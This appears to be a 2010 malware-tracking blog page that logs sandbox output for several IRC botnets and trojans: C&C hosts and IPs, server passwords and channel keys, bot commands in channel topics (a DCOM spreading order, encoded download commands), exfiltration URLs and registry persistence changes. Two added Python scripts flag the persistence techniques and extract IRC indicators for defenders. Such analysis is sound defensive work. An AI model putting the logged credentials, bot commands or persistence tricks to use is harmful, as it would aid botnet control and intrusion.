Month: December 2010

d14-69-123-212.try.wideopenwest.com (botnet hosted with WIDEOPENWEST.COM, Michigan)

Remote Host / Port Number: 69.14.212.123 65267
PASS daloot
JOIN #NzM# screwu
USERHOST USA|00|XP|SP2|3342046
MODE USA|00|XP|SP2|3342046 -x+i
PRIVMSG #NzM# : (patcher.p fixed, version 1.
NICK USA|00|XP|SP2|3342046
USER pnlzszqe 0 0 :USA|00|XP|SP2|3342046
PONG :A2E3B7DC
Now talking in #NzM#
Topic On: [ #NzM# ] [ .root.start dcom135 200 0 0 109.x.x.x -a -b -r -s ]
Topic By: ...

beautybiz.no-ip.org (backdoored password stealer)

DNS Lookup: beautybiz.no-ip.org -> 84.19.169.234
Outgoing connection to remote server: beautybiz.no-ip.org TCP port 80
DNS Lookup: 127.0.0.1 -> 127.0.0.1
Registry Changes by all processes
Create or Open Changes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "UserInit" = C:\WINDOWS\system32\userinit.exe,C:\Windupdt\winupdate.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "winupdater" = C:\Windupdt\winupdate.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System "DisableRegistryTools" = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile "EnableFirewall" = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\...
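The registry changes in this excerpt are the interesting part of the sample: the Winlogon UserInit value has a second, comma-separated program appended to it (so the stealer starts at every interactive logon even if the Run key is cleaned), regedit is disabled through the Policies\System key, and the XP firewall policy is touched. The script below is an added example, not code from the original post or from the sandbox that produced the excerpt. It parses sandbox-style "key "name" = data" lines and flags these techniques. SAMPLE_REPORT is constructed from the lines above with backslashes restored; its last line is a made-up firewall-exception entry in the XP SP2 AuthorizedApplications\List format, modelled on the winsrvn.exe exception in the ush.nerashti.net excerpt further down this page.

```python
"""Triage sandbox "Registry Changes" output for persistence and tampering.

Added example; not code from the original post or from the sandbox.
Entry format assumed: <key path> "<value name>" = <data>, one per line.
"""
import re
from typing import Dict, List, Optional

# Constructed sample: the first four lines mirror the excerpt above, the last
# line is a made-up firewall exception in the XP SP2 "path:*:Enabled:name" form.
SAMPLE_REPORT = r'''
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "UserInit" = C:\WINDOWS\system32\userinit.exe,C:\Windupdt\winupdate.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "winupdater" = C:\Windupdt\winupdate.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System "DisableRegistryTools" = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile "EnableFirewall" = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\Windupdt\winupdate.exe" = C:\Windupdt\winupdate.exe:*:Enabled:winupdate
'''

ENTRY_RE = re.compile(r'^(HKEY_[A-Z_]+(?:\\[^"]*?)?)\s+"([^"]+)"\s+=\s+(.*)$')
DWORD_RE = re.compile(r'\[REG_DWORD, value: ([0-9A-Fa-f]+)\]')


def parse_entries(report: str) -> List[Dict[str, str]]:
    """Return one {key, name, data} dict per parseable registry line."""
    entries = []
    for line in report.splitlines():
        m = ENTRY_RE.match(line.strip())
        if m:
            entries.append({"key": m.group(1), "name": m.group(2), "data": m.group(3)})
    return entries


def dword(data: str) -> Optional[int]:
    """Decode the sandbox's '[REG_DWORD, value: 00000001]' rendering (hex digits)."""
    m = DWORD_RE.search(data)
    return int(m.group(1), 16) if m else None


def userinit_extras(data: str) -> List[str]:
    """Winlogon\\UserInit is normally just '<system32>\\userinit.exe,' on XP;
    every other comma-separated program in it is launched at each logon."""
    parts = (p.strip() for p in data.split(","))
    return [p for p in parts if p and not p.lower().endswith(r"\system32\userinit.exe")]


def triage(report: str) -> List[Dict[str, str]]:
    """Map each entry to a persistence / tampering technique, if it matches one."""
    findings = []
    for e in parse_entries(report):
        key, name, data = e["key"], e["name"], e["data"]
        k = key.lower()
        hit = None
        if k.endswith(r"\winlogon") and name.lower() == "userinit":
            for extra in userinit_extras(data):
                findings.append({"technique": "winlogon_userinit_hijack", "key": key, "name": name, "detail": extra})
            continue
        if re.search(r"\\currentversion\\run(once)?$", k):
            hit = ("run_key_autorun", data)
        elif k.endswith(r"\policies\system") and name.lower() == "disableregistrytools" and dword(data) == 1:
            hit = ("registry_tools_disabled", data)
        elif "\\firewallpolicy\\" in k and k.endswith(r"\authorizedapplications\list"):
            hit = ("firewall_exception_added", name)   # value name is the allowed binary
        elif "\\firewallpolicy\\" in k and name.lower() == "enablefirewall":
            hit = ("firewall_policy_changed", f"EnableFirewall={dword(data)}")
        if hit:
            findings.append({"technique": hit[0], "key": key, "name": name, "detail": hit[1]})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_REPORT):
        print(f"{f['technique']:28} {f['detail']}")
```

The UserInit check is the one worth keeping in a triage kit: a cleaner that only deletes the Run value leaves the logon hook in place, and because Winlogon runs the whole comma-separated list, the second path needs no registry key of its own.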

ush.nerashti.net (Burimi the lamer)

Resolved: [ush.nerashti.net] To [109.123.108.61]
Resolved: [ush.nerashti.net] To [174.127.127.137]
Resolved: [ush.nerashti.net] To [77.68.52.6]
DNS Lookup: ush.nerashti.net -> 77.68.52.6
C&C Server: 77.68.52.6:81
Server Password:
Username: n
Nickname: n|DEU|XP|DELL-D3E62F7E26|mmxwpcz
Channel: #win# (Password: )
Channel topic: :.im /99/106/112/81/55/59/40/125/111/122/35/104/108/44/39/100/113/109/110/59/106/120/102/9/83/106/112/124/99/123/124/36/112/107/113/31/60/117/96/71/109/105/110/103/107/112/46/57/37/59/38/42/23/8/65/72/83/
Registry Changes by all processes
Create or Open Changes
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\S-3685-5437-5687\winsrvn.exe" = C:\Dokumente und...

174.127.127.137.static.midphase.com (Burimi's botnet hosted in the United States, Providence Hosting Services Inc)

Remote Host / Port Number: 174.127.127.137 81
NICK n[USA|XP|COMPUTERNAME]xvfnrcj
USER n "" "lol" :n
JOIN #bul#
PONG 422
PONG :request4.not.found
Now talking in #bul#
Topic On: [ #bul# ] [ 13 .d /99/106/112/81/55/59/40/120/121/125/100/110/115/116/118/113/115/38/127/122/100/56/109/79/79/125/108/53/62/36/44/58/53/52/51/18/53/44/101/67/118/97/45/99/116/112/ ]
Topic By: [ n ]
(abc) .d /99/106/112/81/55/59/40/120/121/125/100/110/115/116/118/113/115/38/127/122/100/56/109/79/79/125/108/53/62/36/44/58/53/52/51/18/53/44/101/67/118/97/45/99/116/112/
(RDP) .d /99/106/112/81/55/59/40/120/121/125/100/110/115/116/118/113/115/38/127/122/100/56/109/79/79/125/108/53/62/36/44/58/53/52/51/18/53/44/101/67/118/97/45/99/116/112/
Registry Modifications
* The newly created Registry Value is:
  o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]...

trin.bi.up.ac.za (botnet hosted with Afrinic, Pretoria, South Africa)

Remote Host / Port Number: 137.215.75.246 6667; 195.197.175.21 6667
NICK drugss
ISON akon black bleed blood dead devil dr evil ghost hustler lord Lucifer mad ManaGer Master mIRC Mr Power sadness Scorpions system
JOIN #Raps
MODE #raps
MODE mwahc +iwx
MODE drugss +iwx
SILENCE +*!*@*
USER net "" "rap-yo-city.dyndns.org" : 6Get away !
NICK samerl
USER ...

pfy.mysite.org (botnet hosted with Bigbyte.cc, Albuquerque, United States)

Remote Host / Port Number: 207.114.175.51 6667
NICK COMPUTERNAME16180
USER COMPUTERNAME16180 0 0 COMPUTERNAME16180COMPUTERNAME16180
JOIN #newaiuwhd
NICK COMPUTERNAME79226
USER COMPUTERNAME79226 0 0 COMPUTERNAME79226COMPUTERNAME79226
NICK COMPUTERNAME61492
USER COMPUTERNAME61492 0 0 COMPUTERNAME61492COMPUTERNAME61492
* The following ports were open in the system:
  Port  Protocol  Process
  1054  TCP       8jg53l4ojo74khk.exe (%Windir%\8jg53l4ojo74khk.exe)
  1056  TCP       8jg53l4ojo74khk.exe (%Windir%\8jg53l4ojo74khk.exe)
  1057  TCP       8jg53l4ojo74khk.exe (%Windir%\8jg53l4ojo74khk.exe)
Registry Modifications ...

xvm-168-229.ghst.net (Ogard / VirUs, the same lamer; big botnet hosted with Gandi UK Dedicated Hosting Servers, United Kingdom)

Remote Host / Port Number: 217.70.188.30 3211; 92.243.28.194 3211; 95.142.163.184 3211; 95.142.168.229 3211
USER VirUs "" "lol" :9813
NICK [USA][XP-SP2]315437
USER VirUs "" "lol" :7634
NICK [USA][XP-SP2]900959
USER VirUs "" "lol" :4049
NICK [USA][XP-SP2]032172
NICK [USA][XP-SP2]456089
USER VirUs "" "lol" :1467
NICK [USA][XP-SP2]687424
USER VirUs "" "lol" :6389
NICK [USA][XP-SP2]442067
USER VirUs "" "lol" :7908
NICK ...

xo39du910.t35.com (spammer trojan hosted with United States Fair Lawn T)

DNS Lookup: xo39du910.t35.com -> 69.10.48.106
Data posted to URLs: http://69.10.48.106/1/post.php (xo39du910.t35.com)
Outgoing connection to remote server: xo39du910.t35.com TCP port 80
Registry Changes by all processes (Create or Open Changes; Reads):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session...

ip-97-74-114-46.ip.secureserver.net (malware hosted with Godaddy.com Inc, Scottsdale, United States)

DNS Lookup: 97.74.114.46 -> 97.74.114.46
Download URLs: http://97.74.114.46/css/style.gif (97.74.114.46)
Outgoing connection to remote server: 97.74.114.46 TCP port 80
Registry Changes by all processes (Create or Open Changes; Reads):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes "MS Shell Dlg 2"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable...

wewqeq.idcbr.net (botnet hosted with Global Net Access Llc, Atlanta, United States)

Remote Host / Port Number: 207.210.96.152 6567
PASS s1m0n3t4
MODE [SI|USA|00|P|83827] -ix
JOIN #carro# c1rc0dus0leil
PONG Apple.Network
NICK [SI|USA|00|P|83827]
USER XP-2586 * 0 :COMPUTERNAME
* The following port was open in the system:
  Port  Protocol  Process
  1053  TCP       conmysys.exe (%Windir%\conmysys.exe)
Registry Modifications
* The newly created Registry Values are:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + Service ares = "conmysys.exe" ...
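Seven of the excerpts on this page (d14-69-123-212.try.wideopenwest.com, ush.nerashti.net, 174.127.127.137.static.midphase.com, trin.bi.up.ac.za, pfy.mysite.org, xvm-168-229.ghst.net and this one) are the same kind of evidence: the bot's IRC join sequence, from which the server password, the bot nick, the channel and its key, and the command sitting in the channel topic can all be read off. The script below is an added example, not code from the original posts or from the sandbox that produced them. It parses such a stream as a TCP reassembly would present it (one IRC message per line, RFC 2812 framing) and pulls out those indicators. SAMPLE_STREAM is constructed from the tokens in the first excerpt on the page; the server-side lines and the server name irc.example are made up, and the bot-nick regex is a heuristic of this example, not something the posts state.

```python
"""Extract C&C indicators from an IRC bot's join sequence.

Added example; not code from the original posts or the sandbox.
Input: one IRC message per line, client lines unprefixed, server lines
prefixed with ':<server>' as in a TCP stream reassembly.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample: client tokens come from the d14-69-123-212 excerpt on this
# page; the ':irc.example ...' server lines are made up for the example.
SAMPLE_STREAM = """\
PASS daloot
NICK USA|00|XP|SP2|3342046
USER pnlzszqe 0 0 :USA|00|XP|SP2|3342046
:irc.example 001 USA|00|XP|SP2|3342046 :Welcome
JOIN #NzM# screwu
MODE USA|00|XP|SP2|3342046 -x+i
:irc.example 332 USA|00|XP|SP2|3342046 #NzM# :.root.start dcom135 200 0 0 109.x.x.x -a -b -r -s
PING :A2E3B7DC
PONG :A2E3B7DC
"""

# Heuristic (an assumption of this example): the nicks on this page are built
# from country|OS|service-pack|random fields (USA|00|XP|SP2|3342046,
# [USA][XP-SP2]315437, n|DEU|XP|DELL-...), so an OS token boxed by | [ ] or -
# is a cheap bot-nick signal. It will miss nicks such as drugss or COMPUTERNAME16180.
BOT_NICK_RE = re.compile(r"[\[\|](?:XP|2K|2000|VISTA|W7|NT)[\]\|\-]", re.IGNORECASE)


@dataclass
class IrcIocs:
    password: Optional[str] = None
    nick: Optional[str] = None
    ident: Optional[str] = None
    channels: Dict[str, Optional[str]] = field(default_factory=dict)  # channel -> key
    topics: Dict[str, str] = field(default_factory=dict)              # channel -> topic
    bot_like_nick: bool = False


def parse_message(line: str) -> Tuple[Optional[str], str, List[str]]:
    """Split one IRC line into (prefix, COMMAND, params); the ':' trailing param stays whole."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:
        line, _, trailing = line.partition(" :")
    params = line.split()
    if trailing is not None:
        params.append(trailing)
    return prefix, params[0].upper(), params[1:]


def extract_iocs(stream: str) -> IrcIocs:
    """Walk the stream once; client commands give credentials, server 332/TOPIC give the topic."""
    iocs = IrcIocs()
    for raw in stream.splitlines():
        if not raw.strip():
            continue
        prefix, cmd, params = parse_message(raw)
        if prefix is None:                                  # client -> server
            if cmd == "PASS" and params:
                iocs.password = params[0]
            elif cmd == "NICK" and params and iocs.nick is None:
                iocs.nick = params[0]
                iocs.bot_like_nick = bool(BOT_NICK_RE.search(params[0]))
            elif cmd == "USER" and params:
                iocs.ident = params[0]
            elif cmd == "JOIN" and params:                  # JOIN #a,#b key1,key2
                chans = params[0].split(",")
                keys = params[1].split(",") if len(params) > 1 else []
                for i, chan in enumerate(chans):
                    iocs.channels[chan] = keys[i] if i < len(keys) else None
        elif cmd == "332" and len(params) >= 3:             # RPL_TOPIC <nick> <channel> :<topic>
            iocs.topics[params[1]] = params[2]
        elif cmd == "TOPIC" and len(params) >= 2:           # topic change pushed while joined
            iocs.topics[params[0]] = params[1]
    return iocs


def topic_command(topic: str) -> Tuple[Optional[str], List[str]]:
    """The herders on this page drive bots through the topic: strip mIRC bold/colour
    codes, then return the first dot-prefixed word and its arguments."""
    clean = re.sub(r"[\x02\x0f\x16\x1f]|\x03\d{0,2}(?:,\d{1,2})?", "", topic)
    words = clean.split()
    for i, w in enumerate(words):
        if w.startswith("."):
            return w, words[i + 1:]
    return None, []


if __name__ == "__main__":
    r = extract_iocs(SAMPLE_STREAM)
    print(r)
    for chan, topic in r.topics.items():
        print(chan, topic_command(topic))
```

The topic parser deliberately does not try to decode the numeric payloads seen in the Burimi topics (.im /99/106/112/81/55/59/40/... and .d /99/106/112/81/55/59/40/...). Both start with the same seven values, the length of "http://", so they are most likely the same per-character encoding of a download URL, but the scheme is not recoverable from what these excerpts show, and the example leaves that step to the analyst with the binary in hand.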